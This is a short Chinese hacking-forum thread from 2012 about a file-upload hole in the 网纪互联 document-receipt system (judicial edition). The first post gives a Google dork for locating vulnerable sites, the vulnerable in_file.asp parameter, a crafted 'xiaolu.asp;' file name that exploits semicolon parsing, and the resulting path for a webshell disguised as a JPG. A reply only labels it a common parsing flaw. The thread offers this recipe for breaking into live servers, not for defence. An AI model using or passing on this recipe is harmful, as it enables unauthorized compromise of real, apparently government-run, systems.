执念 发表于 2012-6-21 07:35:32

网纪互联公文签收系统司法版通杀上传漏洞


google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞通杀
in_file.asp?file_name=xiaolu.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/xiaolu.asp;.jpg

小倩 发表于 2012-9-14 17:22:19

一般解析漏洞
页: [1]
查看完整版本: 网纪互联公文签收系统司法版通杀上传漏洞